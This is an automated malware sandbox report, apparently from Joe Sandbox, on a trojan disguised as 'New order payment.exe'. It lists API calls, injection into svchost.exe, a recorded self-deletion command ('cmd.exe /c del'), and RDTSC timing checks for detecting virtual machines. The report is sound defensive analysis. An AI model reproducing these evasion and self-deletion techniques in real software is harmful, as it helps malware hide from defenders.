          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03846E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03820D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAD0F5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB8B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAC985
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAA6B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D92FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D98C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D98C6B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D92D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DABD45
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B150 appears 107 times
Source: C:\Users\user\Desktop\New order payment.exe | Code function: String function: 0098B150 appears 87 times
Source: C:\Users\user\Desktop\New order payment.exe | Code function: String function: 0041A380 appears 38 times
Source: C:\Users\user\Desktop\New order payment.exe | Code function: String function: 0041A4B0 appears 38 times
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_004185D0 NtCreateFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00418680 NtReadFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00418700 NtClose,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_004187B0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_004185CA NtCreateFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041867A NtReadFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_004186FB NtClose,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009CB040 NtSuspendThread,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9A10 NtQuerySection,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009CA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009CAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9560 NtWriteFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C96D0 NtCreateKey,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009CA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009CA770 NtOpenThread,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C9760 NtOpenProcess,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_004185D0 NtCreateFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_00418680 NtReadFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_00418700 NtClose,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_004187B0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_004185CA NtCreateFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_0041867A NtReadFile,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_004186FB NtClose,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038699A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038696D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038696E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038695D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0386A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869A10 NtQuerySection,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869A20 NtResumeThread,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038699D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038698A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038698F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0386B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038697A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0386A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869760 NtOpenProcess,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0386A770 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_038695F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0386AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03869560 NtWriteFile,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DA8680 NtReadFile,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DA87B0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DA8700 NtClose,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DA85D0 NtCreateFile,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DA86FB NtClose,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DA867A NtReadFile,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DA85CA NtCreateFile,
Source: New order payment.exe, 00000000.00000003.238846897.000000000F176000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New order payment.exe
Source: New order payment.exe, 00000001.00000002.301292454.00000000026EB000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs New order payment.exe
Source: New order payment.exe, 00000001.00000003.244188608.0000000000746000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New order payment.exe
Source: C:\Users\user\Desktop\New order payment.exe | File read: C:\Users\user\Desktop\New order payment.exe
Source: New order payment.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\New order payment.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
Source: C:\Users\user\Desktop\New order payment.exe | Process created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New order payment.exe | Process created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'
Source: C:\Users\user\Desktop\New order payment.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\New order payment.exe | File created: C:\Users\user\AppData\Local\Temp\nseE55E.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/2@13/7
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
Source: C:\Users\user\Desktop\New order payment.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: New order payment.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: wntdll.pdbUGP source: New order payment.exe, 00000000.00000003.242757682.000000000F1F0000.00000004.00000001.sdmp, New order payment.exe, 00000001.00000003.244051355.0000000000630000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: New order payment.exe, svchost.exe
Source: Binary string: svchost.pdb source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
Source: Binary string: svchost.pdbUGP source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041B87C push eax; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041B812 push eax; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041B81B push eax; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041C951 push FFFFFFA3h; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00404F18 push edi; retf
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041B7C5 push eax; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009DD0D1 push ecx; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_0041B87C push eax; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_0041B812 push eax; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_0041B81B push eax; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_0041C951 push FFFFFFA3h; ret
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_00404F18 push edi; retf
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_1_0041B7C5 push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0387D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DAB87C push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DAB81B push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DAB812 push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DAC951 push FFFFFFA3h; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02DAB7C5 push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02D94F18 push edi; retf
Source: C:\Users\user\Desktop\New order payment.exe | File created: C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\svchost.exe | Process created: /c del 'C:\Users\user\Desktop\New order payment.exe'
Source: C:\Windows\SysWOW64\svchost.exe | Process created: /c del 'C:\Users\user\Desktop\New order payment.exe'
Source: C:\Users\user\Desktop\New order payment.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\New order payment.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\New order payment.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000002D98604 second address: 0000000002D9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000002D9898E second address: 0000000002D98994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 6456 | Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 6316 | Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\New order payment.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_00402671 FindFirstFileA,
Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: Prod_VMware_SATA?6
Source: explorer.exe, 00000004.00000000.254493114.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.248427538.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: New order payment.exe, 00000000.00000002.244218595.0000000000776000.00000004.00000020.sdmp | Binary or memory string: \divorces\tryout\marmalade.bmpjylqawoozfsSOFTWARE\roscoepduiiqsjbwqemuykqfwrylxmvbggeyuzsvpgz21176
Source: explorer.exe, 00000004.00000000.280451175.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000004.00000000.247577904.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%%
Source: explorer.exe, 00000004.00000000.274875851.000000000DC2B000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}))
Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000004.00000000.249068214.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000004.00000000.257414229.000000000DC67000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Shell\M22
Source: explorer.exe, 00000004.00000000.288676486.000000000DC2B000.00000004.00000001.sdmp | Binary or memory string: 0ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&96
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_73223070 sclag,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\New order payment.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_732254DA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_7322581C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_7322579F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_732256EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_732257DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00989080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009BF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009BF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009BF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A03884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A03884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009C90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A1B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]
